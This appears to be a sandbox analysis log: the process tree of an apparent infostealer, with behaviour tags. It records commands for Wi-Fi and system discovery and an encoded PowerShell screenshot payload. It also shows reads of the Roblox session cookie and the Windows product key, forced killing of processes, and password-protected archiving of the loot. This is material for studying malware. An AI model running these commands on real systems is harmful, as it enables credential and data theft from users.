C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:1080
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5192
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"4⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1820 -
C:\Windows\system32\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"4⤵PID:4372
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:5220
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"4⤵PID:5132
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath5⤵PID:5248
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="4⤵PID:5164
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=5⤵
- Suspicious behavior: EnumeratesProcesses
PID:5472 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a40kie5w\a40kie5w.cmdline"6⤵PID:5988
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3BEB.tmp" "c:\Users\Admin\AppData\Local\Temp\a40kie5w\CSC9BF0D2C1B4C4E69827C432DCA5E8B9.TMP"7⤵PID:6076
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5516
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"4⤵PID:5596
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5680
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5688
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5724
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"4⤵PID:5752
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5800
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5776
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5856
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:5872
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:5908
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5932
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4064"4⤵PID:6140
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 40645⤵
- Kills process with taskkill
PID:408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4780"4⤵PID:5260
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 47805⤵
- Kills process with taskkill
PID:5288
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3556"4⤵PID:5176
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 35565⤵
- Kills process with taskkill
PID:5376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4064"4⤵PID:3544
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 40645⤵
- Kills process with taskkill
PID:5424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2832"4⤵PID:5192
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 28325⤵
- Kills process with taskkill
PID:5480
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4780"4⤵PID:4952
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 47805⤵
- Kills process with taskkill
PID:2032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3884"4⤵PID:5416
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 38845⤵
- Kills process with taskkill
PID:5652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3556"4⤵PID:5620
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 35565⤵
- Kills process with taskkill
PID:5524
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 856"4⤵PID:5688
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 8565⤵
- Kills process with taskkill
PID:5720
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2832"4⤵PID:5704
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 28325⤵
- Kills process with taskkill
PID:5804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3632"4⤵PID:5668
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 36325⤵
- Kills process with taskkill
PID:5608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3884"4⤵PID:5844
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 38845⤵
- Kills process with taskkill
PID:5780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2492"4⤵PID:3132
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 24925⤵
- Kills process with taskkill
PID:5760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 856"4⤵PID:1760
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 8565⤵
- Kills process with taskkill
PID:5892
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3632"4⤵PID:5972
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 36325⤵
- Kills process with taskkill
PID:5976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:2240
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2492"4⤵PID:392
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 24925⤵
- Kills process with taskkill
PID:3376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:4908
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"4⤵PID:5632
-
C:\Windows\system32\getmac.exegetmac5⤵PID:5852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI13722\rar.exe a -r -hp"06062011" "C:\Users\Admin\AppData\Local\Temp\uHTwj.zip" *"4⤵PID:5472
-
C:\Users\Admin\AppData\Local\Temp\_MEI13722\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI13722\rar.exe a -r -hp"06062011" "C:\Users\Admin\AppData\Local\Temp\uHTwj.zip" *5⤵
- Executes dropped EXE
PID:4552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"4⤵PID:4444
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption5⤵PID:2896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"4⤵PID:1484
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory5⤵PID:5720
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:5668
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:3880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"4⤵PID:6016
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:6008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:628
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:1584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"4⤵PID:3280
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵
- Suspicious behavior: EnumeratesProcesses
PID:3520
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:2492
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:4584
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x244 0x4901⤵
- Suspicious use of AdjustPrivilegeToken
PID:4580
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5212 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0x9c,0x124,0x7ffd22b0cc40,0x7ffd22b0cc4c,0x7ffd22b0cc582⤵PID:5264
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1908,i,14318858670341495641,6422672733006025115,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1900 /prefetch:22⤵PID:5236
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2044,i,14318858670341495641,6422672733006025115,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2148 /prefetch:32⤵PID:5188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2296,i,14318858670341495641,6422672733006025115,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2452 /prefetch:82⤵PID:1244
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,14318858670341495641,6422672733006025115,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3176 /prefetch:12⤵PID:5364
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3416,i,14318858670341495641,6422672733006025115,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3428 /prefetch:12⤵PID:5384
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=1740,i,14318858670341495641,6422672733006025115,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3664 /prefetch:12⤵PID:3956
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4788,i,14318858670341495641,6422672733006025115,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4784 /prefetch:82⤵PID:512
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4908,i,14318858670341495641,6422672733006025115,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4920 /prefetch:82⤵PID:4708
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4460,i,14318858670341495641,6422672733006025115,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4792 /prefetch:82⤵PID:4000
-
-
